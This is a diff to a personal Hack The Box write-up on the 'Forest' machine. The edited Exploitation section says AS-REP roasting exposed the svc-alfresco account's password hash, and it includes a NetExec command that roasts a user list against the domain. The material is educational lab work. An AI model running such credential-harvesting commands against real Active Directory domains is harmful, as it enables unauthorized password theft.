wither/obsidian-notes/05-Boxes/HTB/Forest.md

 ## Exploitation

-Testing the user list for AS-REP roasting revealed accounts with "Do Not Require Kerberos Pre-Authentication" enabled...
+Testing the user list for AS-REP roasting revealed account an account `svc-alfresco` with "Do Not Require Kerberos Pre-Authentication" enabled, and thus allowing me to retrieve their password hash.
 ```bash
 nxc ldap 'FOREST' -u files/users.txt  -p '' -d 'htb.local' --asreproast files/roast.txt